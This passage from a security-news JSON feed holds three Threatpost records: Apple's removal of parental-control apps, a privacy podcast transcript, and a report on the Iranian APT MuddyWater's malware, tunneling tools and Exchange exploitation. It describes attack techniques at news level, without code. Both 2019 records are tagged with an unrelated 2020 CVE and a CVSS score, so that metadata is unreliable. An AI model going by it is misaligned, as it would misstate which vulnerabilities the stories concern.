"Apple is defending its decision to take down several highly popular parental control apps amidst a firestorm of backlash, saying it did so for \u201cprivacy and security\u201d reasons.\n\nApple came under scrutiny this weekend after a New York Times article alleged that the phone giant had unfairly removed or restricted at least 11 top screen-time and parental-control apps from its marketplace \u2013 after creating its own screen-time app. Among those that have been removed are OurPact, which has 3 million downloads, and Mobicip, which has 2.5 million downloads.\n\nWhile it looks like a competitive move, Apple tells a different story: Its aim was to weed out apps that were using mobile device management (MDM) technology it said, which gives third-party control and access over other devices and sensitive information, including location, app use and more. Parental-control apps, which allow parents to keep tabs (and set limits) on their children\u2019s on-phone activities, locations and more, are thus effectively collecting way too much data, Apple said.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWe recently removed several parental-control apps from the App Store, and we did it for a simple reason: They put users\u2019 privacy and security at risk. It\u2019s important to understand why and how this happened,\u201d the company said in a [Sunday statement](<https://www.apple.com/newsroom/2019/04/the-facts-about-parental-control-apps/>), entitled \u201cThe Facts About Parental Control Apps.\u201d\n\nRegardless of the reason, the incident has raised questions about how competition is handled between apps and the sometimes-competing platforms that they are sold on. Impacted app developers, for their part, continue to be up-in-arms regarding the incident \u2013 with two popular parental control apps, Kidslox and Qustodio, last week filing an anti-competition complaint with the European Commission\u2019s competition office.\n\n## Angry App Devs\n\nThe Saturday[ report](<https://www.nytimes.com/2019/04/27/technology/apple-screen-time-trackers.html>) by the New York Times_, _working with app data firm Sensor Tower, shows that Apple has removed or restricted 11 of the 17 most downloaded parental-control apps, as well as restricting lesser-known apps. That includes forcing apps to remove features that enable parents to control children\u2019s devices, or restrict access to adult content.\n\nThe move comes after Apple launched its own screen control app, Screen Time, a feature built into iOS 12 that enables users to set screen time and limits on their own phones.\n\nThe complaint from Kidslox and Qustodio that was filed with the European Commission\u2019s competition office was filed in tandem with the report, saying that the removal and restriction of parental-control apps was an anti-competitive practice by nature.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/29144205/screen-time-1-.png>)\n\nParental Control Apps\n\nKidslox alleges that Apple has required it to make changes to its app that ultimately harmed it competitive factor.\n\n\u201cTo create Screen Time, Apple took the best pieces and best practices from existing parental-control and well-being apps in the App Store, bringing no tangible innovations to market,\u201d Kidslox CEO Viktor Yevpak said in a statement provided to Threatpost. \u201cStanding up to Apple is about even more than fair competition.\u201d\n\nMeanwhile Qustodio, in a statement showed to Threatpost regarding the EU complaint, said that Apple has arbitrarily blocked several parental-control apps in the market from making app updates, while completely removing others.\n\n\u201cWith the introduction of Apple\u2019s Screen Time, developers in the parental control category experienced unprecedented anti-competitive behavior from Apple,\u201d Qustodio CEO Eduardo Cruz said in the statement. \u201cThe company acts as both a marketplace and a gatekeeper and uses its dominant position to create exclusive competitive advantage for its own service.\u201d\n\nOther screen-time apps began complaining about being removed from the Apple Store all the way back in the fall of 2018, including Mute, a screen-time tracking app.\n\nNick Kuh, creator of Mute, [complained](<https://medium.com/@nick.kuh/mute-app-startup-to-shutdown-a1db01440c56>) in October 2018 that Apple had removed his app from the App Store (Apple later returned his app after his post gained media attention).\n\n\u201cIt appears that Apple are now shutting down many (all?) screen-time tracking apps now that they\u2019ve added screen-time tracking into iOS 12,\u201d he said in his post. \u201cIt turns out that Apple have sent a similar email to many other app developers of screen-time tracking and parental-control apps. I believe that Mute is one of the first to go, but expect others to disappear from the App Store in the coming weeks as their notice period expires.\u201d\n\n## Apple Hits Back** **\n\nIn response to reports of developer outrage, Apple said in a statement: \u201cApple has always supported third-party apps on the App Store that help parents manage their kids\u2019 devices. Contrary to what the _New York Times_ reported over the weekend, this isn\u2019t a matter of competition. It\u2019s a matter of security.\u201d\n\nApple said several of the apps removed use the MDM format, which is typically used by enterprises to give companies control over their employees\u2019 devices. However, when non-enterprise developers use the feature on their apps, the technology can have dangerous privacy and security implications, Apple said.\n\nThese MDM functions give apps a \u201cconfiguration profile\u201d which is generally used for enterprises \u2013 and allow users to configure or track certain settings \u2013 including app settings, Wi-Fi and permissions. In other words, app developers behind the apps gain access to all data \u2013 such as location, activity and more \u2013 of the children whose phones are being controlled.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/29144327/screen-time-2.png>)\n\nApple Screen Time\n\nApple did not respond to multiple requests for comment from Threatpost.\n\nThe company in its statement said that it began noticing that non-enterprise developers were using MDM back in early 2017, and updated their guidelines based on that work in mid-2017.\n\n\u201cWhen we found out about these guideline violations, we communicated these violations to the app developers, giving them 30 days to submit an updated app to avoid availability interruption in the App Store,\u201d Apple said. \u201cSeveral developers released updates to bring their apps in line with these policies. Those that didn\u2019t were removed from the App Store.\u201d\n\nHowever, app developers argue that MDM is not used maliciously and that parents setting up the apps are given fair notice about the MDM features when downloading the app.\n\nSuren Ramasubbu, CEO of one of the parental control apps impacted by Apple\u2019s crackdown, Mobicip, said that when parental control apps using MDM is installed, it is the parent that goes through the process of setting up \u2013 and they are explicitly asked to agree to the terms and conditions and privacy policy before installing the MDM profile and certificate.\n\n\u201cPlease note that the parent has explicitly agreed to enroll the device in a third-party MDM system,\u201d he said in a [post](<https://medium.com/@suren_60419/apples-case-for-removing-screentime-apps-seven-questions-for-phil-schiller-33cf78b01713>) over the weekend. \u201cDo these parents understand the risks? May be. May be not. But should it be the parent who decides the risk vs. reward? Given that Apple Screen Time requires both parents and children to be on Apple devices, and given that most families today have a blend of devices with the parents on Android, isn\u2019t it anti-competitive to not give parents this choice?\u201d\n\nApps like Kidslox and Qustodio continue to maintain that Apple\u2019s practices are unfair \u2013 and ultimately hurting both app developers and consumers.\n\n\u201cQustodio and Kidslox are asking Apple to stop this unprecedented hostile behavior, compete fairly, and open up exclusive API\u2019s and technologies introduced in their own Screen Time service,\u201d according to Qustodio.\n\nIt\u2019s not the first time Apple has come under fire for anti-competition app store practices \u2013 in March, [Spotify filed a complaint](<https://newsroom.spotify.com/2019-03-13/consumers-and-innovators-win-on-a-level-playing-field/>) against the iPhone maker saying that newly-introduced App Store rules \u2013 such as a 30 percent tax imposed on purchases made via Apple\u2019s payment system \u2013 stifle competing music services that are being sold on its platform.\n", "cvss3": {}, "published": "2019-04-29T19:26:31", "type": "threatpost", "title": "Apple Defends Parental Control App Removal Amid Backlash", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2019-04-29T19:26:31", "id": "THREATPOST:22663CEB225A1F7F9DD4EBD8B84956C1", "href": "https://threatpost.com/apple-parental-control-app-removal/144181/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:11", "description": "Data privacy has been an outstanding theme this past week, and the Threatpost team discussed the biggest privacy related news. In the news wrap podcast for April 26, the team discussed the backstories behind several reports from the week, including:\n\n * Facebook potentially [facing Federal Trade Commission (FTC) fines](<https://threatpost.com/facebook-5-billion-ftc-fine/144104/>) as high as $5 billion for its data-security practices\n * A report that employees at Amazon can [access geolocation information](<https://threatpost.com/amazon-employees-personal-alexa/144119/>) for Alexa users\n * Questions around data security and consent around[ facial recognition](<https://threatpost.com/facial-recognition-consent-doesnt-exist-threatpost-poll-finds/144126/>) after the EU\u2019s approval of a massive biometrics database\n * The exposure of [2 million passwords](<https://threatpost.com/leaky_app_data/144029/>) for Wi-Fi hotspots online by an insecure database\n\n[\ufeff\n\n](<http://iframe%20style=border:%20none%20src=//html5-player.libsyn.com/embed/episode/id/9544445/height/360/theme/legacy/thumbnail/yes/direction/backward/%20height=360%20width=100%%20scrolling=no%20%20allowfullscreen%20webkitallowfullscreen%20mozallowfullscreen%20oallowfullscreen%20msallowfullscreen/iframe>)\n\n_Below is a lightly edited transcript of the podcast._\n\n**Lindsey O\u2019Donnell**: Welcome to the Threatpost podcast, and the Threatpost team is all here this Friday morning. You\u2019ve got Lindsey O\u2019Donnell and I\u2019m here with Tara Seals and Tom Spring. Hey, everyone.\n\n**Tara Seals:**Hey, Lindsey.\n\n**Tom Spring: **How\u2019s it going, Lindsey? How\u2019s it going, Tara?\n\n**Lindsey**: Good. So, privacy has really been kind of the name of the game this week, in terms of all the stories that we\u2019ve written. And I know, we had a lot of data privacy type stories, everything from Amazon Echo privacy issues to facial recognition. But if we\u2019re talking about data privacy, I think we should really start by bringing Facebook into the conversation here, as we usually do.\n\n**Tara: **Yeah, that seems to have been a top theme of the week for sure. And you did a ton of reporting on that this week.\n\n**Lindsey: **Yeah, so, the big news this week was that Facebook may be facing fines of between $3 to $5 billion for that FTC fine that was related to the Cambridge Analytica incident last year, and all of their data privacy issues that they\u2019ve had since then. So, Facebook had its earnings and disclosed this amount of money that is set aside as contingency expenses. And I feel like we keep hearing about reports of Facebook, having all these data sharing incidents, or having all these crazy data practices, but now we\u2019re really looking at the consequences. And everyone\u2019s wondering how data collection and sharing will be regulated and what kind of fines we\u2019ll see. So that should be interesting to keep an eye on how this actually plays out in the coming months.\n\n**Tara: **Yeah, and I wonder in terms of all of that, when we talk about the GDPR, over in Europe, and how it has really stringent requirements for explicit consent before somebody harvests your data, which obviously is not something that Facebook adheres to, for U.S. citizens anyway \u2013 have there been any rumblings out there in terms of whether or not Facebook might face future regulation?\n\n**Lindsey: **I think that\u2019s there\u2019s been a lot of discussion about it. I know, obviously, Mark Zuckerberg has appeared in front of Congress. And it\u2019s definitely been at the forefront of discussion. But beyond some state-level data privacy practice regulations, it\u2019s something that people are still trying to figure out. So I think that\u2019s kind of why this FTC fine is at the center of attention. There was news today, actually, that the _New York Times _was talking to sources who said that the FTC is discussing stronger monitoring of Facebook\u2019s privacy policies, as well as direct punishment of Mark Zuckerberg. So that raises questions about how to deal with data sharing, whether it\u2019s kind of hitting at the CEO, or even just imposing bigger fines. But Tara, I know, you listen to the actual earnings call. Were there any special call outs about the fine or data security in general? I\u2019m curious if they talked about it at all.\n\n**Tara:**They studiously avoided talking about the fines specifically, which, it\u2019s a charge off of, they added $3 billion, and they said it could go up to as much as $5 billion, and so that ate into their profit, which is kind of interesting, because they reported, I think it was, I don\u2019t have it in front of me, but I think it was around like $2.3 billion in profit for the quarter.\n\nAnd that that is taking into account that $3 billion contingency fine. And they didn\u2019t really specifically discuss it. But they did say that they expected profits to continue to waver a little bit going forward, due to regulatory headwinds, as well as advertising-related falloff, because they\u2019re not sure that they can make the same amount of revenue off of ad targeting that they have in the past.\n\nSo that sort of in a roundabout way speaks to the fact that they\u2019re looking into making some changes in terms of how they collect and use user data. But that\u2019s sort of reading between the lines, and they certainly didn\u2019t say anything explicit about it, unfortunately.\n\n**Lindsey: **Right. Well, I know one big point of discussion was, is this enough? How does this compare to past fines? Because I know Facebook has faced various fines in the past, which Tara you have actually written about. I think it was in December it was fined like $11 million. And then in October, it was fined $645,000. So obviously, those kind of shy away in comparison to $5 billion, but I think people are still kind of asking, how does this compare? Facebook\u2019s kind of overall \u2013\n\n**Tara: **Yeah, their overall profit, annual, you know, $3 to 5 billion is significant for them, actually.\n\n**Tom:**Well, I just looked it up. Facebook made more than $40 billion in revenue in 2017.\n\n**Tara: **What\u2019s the profit? That\u2019s the real marker right?\n\n**Tom: **Well, it is the real marker.\n\n**Lindsey: ** I\u2019m curious what will come out of it. But I do know that everyone\u2019s really looking at this as some sort of precedent for how Facebook will be regulated in the future, if it continues with the data security issues that have been happening over the past year, since Cambridge Analytica.\n\n**Tara: **One of the things too, Lindsey, that I wanted to ask you about was, you know, [the poll that we did](<https://threatpost.com/three-fourths-of-consumers-dont-trust-facebook-threatpost-poll-finds/143963/>) on attitudes towards Facebook. But, you know, also in the wake of their earnings that showed that they had seen an 8 percent year over year, subscriber jump, so the headlines, even though people are sort of horrified by them, they\u2019re not really dissuading people from actually using the platform, which I think is interesting. And then also their stock price just skyrocketed, after they reported their earnings, even with the charge off for the fine. So I don\u2019t know, I don\u2019t know what\u2019s going to happen in the future and whether any of this is going to make a difference in terms of whether or not it\u2019s successful as a company.\n\n**Tom: **I was just thinking, I think that, it\u2019d be interesting to watch the regulatory space to see what the U.S. does, especially with GDPR, in terms of what\u2019s going on in Europe, and really a constant sort of, you know, march of bad news in terms of privacy, and also with breaches that are taking place, not only with Facebook, but with a ton of other companies \u2013 I think what we\u2019re doing is we\u2019re setting up in 2020, and beyond some new rules around privacy and some new regulations around privacy. Because I mean, as you just pointed out, Tara, fines and threats and punishments are not really are impacting the way Facebook\u2019s doing business or hurting them in terms of their business model.\n\n**Lindsey: **Right. I don\u2019t think at all that people are going to stop using Facebook. And I mean, to be totally honest, even if they do adopt some sort of model where you pay to use the platform without advertising or without your data being collected and shared \u2013 I\u2019m not sure how many people would even opt in for that as well. I mean, I could be completely wrong. But I don\u2019t know if people are going to pay an extra like $5 a month or something to use a social media platform that\u2019s already free.\n\n**Tom: **Yeah, I don\u2019t think anybody\u2019s going to be paying. But I think what you\u2019ll see is probably some government intervention. That\u2019s my prediction. I mean, the things that we regulate here in the U.S. \u2013 these companies, whether it be Amazon, Google, or Facebook, they\u2019ve basically had a clear runway to do whatever they wanted for I don\u2019t know how many years. And, you know, if you think about all the different things that we regulate in this country, privacy really isn\u2019t one of them right now, but certainly isa right target for legislators to focus on.\n\n**Lindsey: **Right. That\u2019s the good point. Speaking of Amazon, I know, Tara, you covered a really interesting story this week too about news of their auditing program for Echo devices, which had already been reported. But now I guess a new report said that they\u2019re also exposing geolocation data, in addition to voice data. Can you add some color there?\n\n**Tara: **Sure. So, this story was really interesting to me. And it\u2019s not just Echo either. It\u2019s also, you know, the other Alexa devices including the Fire TV devices and there are tons of third-party gadgets that have Alexa built in now. So this is kind of a broad reaching story, from an Internet of Things perspective. But yeah, so apparently, and as you pointed out, this is something that _Bloomberg _had broken a story on about three weeks ago, talking about the fact that Amazon has a team of people in place that may manually audit Alexa interactions to make sure that the AI is learning appropriately. And it\u2019s been effective and accurate and returning good results for users, and all that kind of thing. But what\u2019s interesting is in the process of that, this data, which is supposed to be anonymous, right? So it\u2019s just sort of random snippets \u2013 human people will listen to this, and then see what Alexa\u2019s response was matched up, make sure that it\u2019s accurate, do whatever secret sauce they have to do with the algorithm and the AI to fix it, or to make her smarter \u2013 But in the process of this, apparently, geolocation data gets scooped up here. Because when people ask, Alexa, tell me what the weather forecast is, or Alexa, I\u2019m feeling like Chinese, is anybody delivering to my house, that type of thing. That necessarily, obviously, those local results have to be tied to geolocation data. So they\u2019re scooping up and harvesting and storing and logging GPS coordinates, in addition to sort of these random, other snippets. And so there were five different employees within Amazon that are working on this program, that basically came forward and said that they feel that nobody gave their consent for this and that it\u2019s too broad of an access for them to have. And then they actually on a whim, sort of plugged these coordinates into Google Maps and found that they could actually track somebody\u2019s place of business or their house, and even bring up a picture of that house. And through other means, actually identify who lives there, and then tie all this other information together and be able to create a very creative profile.\n\n**Tom: **I agree with you, Tara, I think that we need to be more concerned about the privacy that we hand over to these types of digital devices. And I\u2019m even more concerned now about the privacy issues that have surround geo-specific apps, where you\u2019re using an app and it understands where you\u2019re at and gives you sort of context-relevant information, and how that data is being used, and who\u2019s using it, and who\u2019s collecting it. When you think about Amazon, they\u2019re a much more potentially powerful company considering all the tentacles that it has into my buying and my data, and my home with their Alexa speakers.\n\n**Lindsey:**Yeah, that\u2019s a really good point. And I\u2019m curious too about the consent and notification side of all of this. I mean, did they have any response Tara about if they gave any notification that they were doing any of this at all? Is there anything on Amazon\u2019s website about this program?\n\n**Tara: **No, no, this was completely in the background until _Bloomberg _came forward with their report, they didn\u2019t acknowledge that it exists. And they just put out a statement saying, you know, we take privacy seriously. And saying, we limit, the number of people that have access to this, who are tasked with doing this as part of their job, and they\u2019re bound by, you know, all kinds of restrictions and things like that it\u2019s highly controlled.\n\n**Tom: **I gotta come back to the point where I feel like this is an area ripe for regulation. I\u2019m not pro regulation but I mean, if this is something that consumers are outraged about \u2013 I think there\u2019s got to be a GDPR type regulations that we\u2019re going to see here in the U.S. that that are going to impact the Facebook\u2019s and the Amazons in the world.\n\n**Tara: **Right and now, we have other types of privacy and sort of potentially intrusive privacy issues to worry about too \u2013 Lindsey, going back to some of the reporting you did this week, but with the facial recognition stuff is happening. You know that that seems like sort of the Wild West out there. There\u2019s no regulation around that.Right?\n\n**Lindsey: **Well, yeah, exactly. And the scary thing about that, too, is that a lot of the facial recognition applications out there are actually being used by the government. So by the Department of Homeland Security and by policemen and whatnot. But yeah, facial recognition came up in the headlines a bunch this week, because there\u2019s been two different incidents. The first was you guys may have heard the EU last week approved a massive biometrics database that would combine the data from law enforcement, from Border Patrol, and more for both EU and non US citizens. So there was that. And then there was another incident this week that occurred where a JetBlue passenger was boarding a flight. And she noticed that instead of scanning her boarding pass, or taking a look at her passport, she was directed to look into a camera, before being allowed on onto the jet bridge. So she was confused about what was going on and so tweeted at JetBlue. And it turns out, this was part of a Customs and Border Patrol program that\u2019s used in I think, 17 airports, where it uses facial recognition to identify passengers and let them through the gateway onto the plane. So her tweet went viral and kind of started this massive conversation about facial recognition and you know, if you can consent and where the data is coming from, how it\u2019s being shared. So that\u2019s been a really interesting story to cover, and kind of see the backlash and reaction to both of these incidents.\n\n**Tom: **I can relate to that. I recently traveled to Mexico, for a little vacation. And, I am seeing facial recognition more and more in my life. I think the interesting thing about your story, Lindsey, was also you wrote about consent, whether or not all of these facial recognition systems actually ask for consent and get consent, which they don\u2019t. But when I went to Mexico, we flew into Mexico, and then we went through customs in Mexico, and Mexico had immigration kiosks, where they asked for facial recognition and fingerprints, and to scan our passports, which \u2013 I was really creeped out. My son, who\u2019s 14 years old, I think probably is now part of the government database of fingerprints and facial recognition. It was kind of weird. Considering, you know, he\u2019d been off grid, perhaps I think for a while now, he\u2019s part of the system. And then we flew back into the United States. There was these huge immigration lines in the Boston Airport. And one of the things that we were able to do was to cut the line by using what was called a mobile passport app. And I didn\u2019t realize it but when you use the app, and you get to skip this, this huge onerous line that goes to basically more facial recognition kiosks for people coming into the United States. And the app itself was pretty slick. I mean, it\u2019s kind of funny, because I felt really good about using the app, because it allowed me to cut in line. But the app basically did a facial recognition, had me input my passport information, and basically, took my identity in this app. And, I was so eager to cut the line, I gotta admit, I kind of skipped over a lot of the terms of services. And it saved me about 45 minutes. And for the price of handing over my biometric data to the government and to this to this app.\n\n**Lindsey: **That experience brings up a really good point, because, I think that there definitely are benefits to facial recognition. Like, it\u2019s not all about this dire Orwellian society. I think it makes these processes so much more efficient. But I do think there\u2019s also a bunch of kind of privacy concerns that people expressed to me over the past week. And, Tom, like you were saying, consent and notification, but then also in terms of how the data is being secured, how it\u2019s being shared, and who\u2019s gaining access to that data. So I think that there\u2019s kind of a lot that goes into it. I know that we actually did a poll, a Threatpost poll, and half of the respondents, this kind of surprised me, but half of the respondents said that they don\u2019t believe consent is realistically possible when it comes to facial recognition. So I thought that was interesting, too, because if you think about some of the use cases where biometrics and facial recognition exists, if you have like a security camera, or surveillance camera that is using facial recognition, there\u2019s not a lot you can do to opt out of that except for avoiding that area.\n\n**Tom:**Well, I think you mentioned that the White House now has a zone where they use facial recognition. And right there, there\u2019s no way you can say no, you walk into that zone. And you\u2019re basically get put into a big database, and they cross reference it and figure out who you are.\n\n**Lindsey: **Right. So there\u2019s a lot that goes into that. And then when I was talking to a bunch of security people at the Electronic Frontier Foundation, as well, they were mentioning that there really needs to be regulation for all this. And there, there is one law that exists in Illinois, where it basically regulates the collection of biometric data without consent. But they think that there needs to be more. And in particular, regulation that impacts law enforcement, as opposed to just businesses which that law did. So I know, there\u2019s also been a new bill that was introduced in March, it was, what was it called, the Commercial Facial Recognition Privacy Act, that would have like more widespread implications for businesses in terms of how what kind of notification and consent they would need when they use facial recognition. So I think that\u2019s kind of a step in the right direction, but something to be looking out for.\n\n**Tom: **Yeah, facial recognition has been a creepy topic for a long time. But you know, as these GPUs get better, and these computers get better, and the efficiency of the compute behind them get better. It just becomes even creepier. I don\u2019t even think the tin foil hats will help protect you.\n\n**Lindsey: **So Tom, you also had an interesting story this week. I think it was about passwords being \u2013 I think it was 2 million passwords were \u2013 being exposed.\n\n**Tom: **Yeah. So I mean, we hear about these breach stories all the time. And I mean, there\u2019s probably like, since we\u2019ve been talking, there\u2019s probably been like three breaches, or should I say leaky servers and insecure data on the internet. And one of the things that I think is kind of interesting about the story is that the leaky data, it was tied to a China-based app manufacturer, called Wi Fi Finder. And researchers at GDI Foundation, found 2 million hotspots and passwords for those hotspots on the servers of this app, this Android app called WiFi Finder. And essentially, it\u2019s pretty straightforward. The app itself is an Android-based app, you can get it on Google Play. And it\u2019s one of many of apps that do the same thing. And that is essentially crowdsource on Wi-Fi hotspot data, and also pairing that information with passwords. So the idea is if your dataset is big enough, and you\u2019re wandering around with this app on your phone, you can find a hotspot, and you can authenticate to that hotspot, and you don\u2019t have to ask anybody for a Wi-Fi password. Now, the data that was found on the servers was pretty extensive in the sense that it wasn\u2019t just commercial businesses. So you know, you go to Starbucks, you go to your local gym, or you go to, you know, a bookstore or something like that, you know, you have these public Wi Fi hotspots with a password that you may have to ask for, you may have to look for. And what was happening was that people were crowdsourcing private companies that were not, generally publicly accessible. And for some odd reason, and this really wasn\u2019t explained very well in the reporting, of the research, was that there was a massive, massive amount of Wi-Fi hotspots that were owned by home users like consumers. And so you would you basically had a lot of a lot of password information and a lot of hotspots by consumers in their homes. And the concern there is, is that in a commercial setting, or even in a sort of a public business, publicly accessible hotspot, there are protections put in place to prevent people from messing with the router configurations and accessing some of the some of the settings within the router. But as if you have access to a home router, those security measures are not in place. And there was no documented cases of hacking, but the concern was there regarding that type of information being available to anybody that had access to this leaky server.\n\n**Lindsey:**I feel like we keep seeing this issue of insecure databases and these accidental exposures, which, obviously are different from a malicious breach. I\u2019m curious if there\u2019s something that can be done to prevent this for people who own these databases. I mean, Tom, did you talk to anyone, any experts who had any recommendations about how to better secure databases and kind of what the underlying problem is here?\n\n**Tom: **I did talk to a couple experts on this one. And, you know, the advice is always the same.In terms of leaky data on servers, it doesn\u2019t change much. Just make sure you configure your servers correctly, and make sure that they\u2019re not accessible to the public. I mean, there\u2019s a couple strategies that you can apply to that. I think one of the one of the other suggestions was the way in which some of these publicly accessible sites providing and offer Wi-Fi, and that would be more or less not an open Wi-Fi, not an insecure Wi-Fi, but things that use tokens and allow and divvy out Wi-Fi to individuals using a specific time delineated username and a unique password. And that way, it would basically render all of these apps useless, because there would be a unique username and a unique password, that would timeout within a certain period of time, which would really create a much more secure public Wi-Fi experience. And that was really the suggestion. And that was really what the experts were saying that I talked to regarding the blowback on this story.\n\n**Lindsey: **Well, I\u2019m feeling sufficiently like I need more privacy right now. Maybe we should wrap up now, Tom and Tara, thanks for taking the time and really interesting discussion today.\n\n**Tara: **Yeah. Thanks, Lindsay. Thanks, Tom.\n\n**Tom: **Yeah, have a great weekend. Have a great weekend.\n\n**Lindsey: **Catch us next week on the Threatpost podcast.\n\nFor direct download, [click here](<http://traffic.libsyn.com/digitalunderground/NEWS_WRAP_FINAL.mp3>).\n", "cvss3": {}, "published": "2019-04-26T17:57:36", "type": "threatpost", "title": "News Wrap: Amazon Echo Privacy, Facebook FTC Fines and Biometrics Regulation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2019-04-26T17:57:36", "id": "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147", "href": "https://threatpost.com/threatpost-news-wrap-podcast-for-apr-26/144144/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-13T18:12:51", "description": "U.S. Cyber Command has confirmed that [MuddyWater](<https://threatpost.com/wirte-middle-eastern-governments/176688/>) \u2013 an advanced persistent threat (APT) cyberespionage actor aka Mercury, Static Kitten, TEMP.Zagros or Seedworm that\u2019s historically [targeted government victims](<https://threatpost.com/muddywater-apt-custom-tools/144193/>) in the Middle East \u2013 is an Iranian intelligence outfit.\n\nThe link has been suspected, and now it\u2019s government-stamped. On Wednesday, USCYBERCOM not only confirmed the tie; it also disclosed the plethora of open-source [tools and strategies](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/12/cnmf-identifies-and-discloses-malware-used-iranian-apt-muddywater>) MuddyWater uses to break into target systems and released malware samples.\n\n\u201cMuddyWater has been seen using a variety of techniques to maintain access to victim networks,\u201d according to USCYBERCOM\u2019S National Mission Force (CNMF). \u201cThese include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.\u201d\n\nUSCYBERCOM has uploaded multiple MuddyWater-attributed malware samples to [VirusTotal](<https://www.virustotal.com/gui/user/CYBERCOM_Malware_Alert>).\n\n> Iranian MOIS hacker group [#MuddyWater](<https://twitter.com/hashtag/MuddyWater?src=hash&ref_src=twsrc%5Etfw>) is using a suite of malware to conduct espionage and malicious activity. If you see two or more of these malware on your network, you may have MuddyWater on it: <https://t.co/xTI6xuQOg3>. Attributed through [@NCIJTF](<https://twitter.com/ncijtf?ref_src=twsrc%5Etfw>) [@FBI](<https://twitter.com/FBI?ref_src=twsrc%5Etfw>)\n> \n> \u2014 USCYBERCOM Cybersecurity Alert (@CNMF_CyberAlert) [January 12, 2022](<https://twitter.com/CNMF_CyberAlert/status/1481341952247349248?ref_src=twsrc%5Etfw>)\n\nUSCYBERCOM\u2019s [press release](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>) described MuddyWater as being \u201ca subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).\u201d The [Congressional Research Service](<https://crsreports.congress.gov/product/pdf/RL/RL32048>) describes MOIS as conducting \u201cdomestic surveillance to identify regime opponents\u201d and said that the agency is responsible for surveillance of anti-regime activists abroad through a network of agents placed in Iran\u2019s embassies.\n\n## New Variants of PowGoop Malware\n\nAmong multiple malware sets, MuddyWater is using new variants of the PowGoop malware family, CNMF said.\n\nPowGoop was first [described](<https://unit42.paloaltonetworks.com/thanos-ransomware/>) by Palo Alto Networks in September 2020, when it was used in attacks on two state-run organizations in the Middle East and North Africa that ultimately installed and ran a variant of the [Thanos](<https://threatpost.com/thanos-ransomware-weaponize-riplace-tactic/156438/>) ransomware.\n\nAt the time, Palo Alto suspected that the threat actors were using a downloader \u2013 one that researchers dubbed PowGoop \u2013 to reach out to a remote server to download and execute PowerShell scripts. The name comes from the use of GoogleUpdate.exe to load a malicious, modified version of goopdate.dll \u2013 a DLL that\u2019s used to load a malicious PowerShell script from an external file.\n\nPowGoop has been buffed up since it was first spotted: SentinelLabs on Wednesday [explained](<https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/>) that significantly enhanced, newer variants of PowGoop have shown up in the wild, discovered in recently triaged incidents, \u201csuggesting the group continues to use and maintain it even after recent exposures.\u201d\n\n\u201cThe new variants reveal that the threat group has expanded its arsenal of legitimate software used to load malicious DLLs,\u201d SentinelOne intelligence researcher Amitai Ben Shushan Ehrlich wrote.\n\nEhrlich explained that, aside from GoogleUpdate.exe, three more benign pieces of software are abused in order to sideload malicious DLLs: Git.exe, FileSyncConfig.exe and Inno_Updater.exe.\n\nCNMF has shared new samples showing the different parts of MuddyWater\u2019s new suite of tools, along with JavaScript files used to establish connections back to malicious infrastructure. They include new PowGoop command-and-control (C2) beacon variants as well as the Mori Backdoor: a backdoor used for cyber espionage that employes DNS tunneling to communicate with the C2 infrastructure.\n\n\u201cAny instances of these files may indicate an attacker in the network,\u201d CNMF reiterated about newly released and already known indicators of compromise (IoC). \u201cShould a network operator identify multiple of the tools on the same network, it may indicate the presence of Iranian malicious cyber actors.\u201d\n\n## Love of Tunneling, Exchange Exploits &amp; Ruler Abuse\n\nSentinelLabs drilled down into multiple additional recent findings about MuddyWater\u2019s techniques, tactics and procedures (TTPs), including:\n\n**MuddyWater Tunneling Activity: **\u201cThe operators behind MuddyWater activities are very fond of tunneling tools,\u201d SentinelOne\u2019s Ehrlich wrote. \u201cThe custom tools used by the group often provide limited functionality, and are used to drop tunneling tools which enable the operators to conduct a wider set of activities.\u201d\n\nMuddyWater attackers are using tunneling tools including Chisel, SSF and Ligolo: tools that enable the threat actor to connect to machines within target environments as if they were inside the operator LAN, he explained.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/01/13120926/Summary-of-MuddyWater-tunneling-using-Chisel--e1642093784315.png>)\n\nSummary of MuddyWater tunneling using Chisel. Source: Sentinel Labs.\n\n**Exploiting Microsoft Exchange: **Sentinel Labs has also tracked MuddyWater targeting Exchange servers of high-profile organizations. \u201cThis subset of Exchange exploitation activity is rather interesting, as without context it would be difficult to attribute it to MuddyWater because the activity relies almost completely on publicly available offensive security tools,\u201d Ehrlich noted.\n\nThey\u2019re using two tools to try to exploit Exchange servers: a publicly available script for exploiting [CVE-2020-0688](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) \u2013 a vulnerability that enables remote code execution (RCE) for an authenticated user \u2013 and Ruler, an open source Exchange exploitation framework recently used to target a string of Middle Eastern telecom operators and IT companies, as [reported](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east>) by Symantec\u2019s Threat Hunter Team last month.\n\n## MuddyWater: Better &amp; Better at Stirring Up Muck\n\nAnalysis shows that the MuddyWater APT continues to evolve and adapt its techniques Sentinel Labs summarized. \u201cWhile still relying on publicly available offensive security tools, the group has been refining its custom toolset and utilizing new techniques to avoid detection,\u201d Ehrlich observed, pointing to evolution of the PowGoop malware family, the group\u2019s use of tunneling tools, and its targeting of Exchange servers in high-profile organizations.\n\nThe group doesn\u2019t have to be fancy to be effective, he noted: \u201cLike many other Iranian threat actors, the group displays less sophistication and technological complexity compared to other state-sponsored APT groups. Even so, it appears MuddyWater\u2019s persistency is a key to their success, and their lack of sophistication does not appear to prevent them from achieving their goals.\u201d\n\n**Password** **Reset: ****[On-Demand 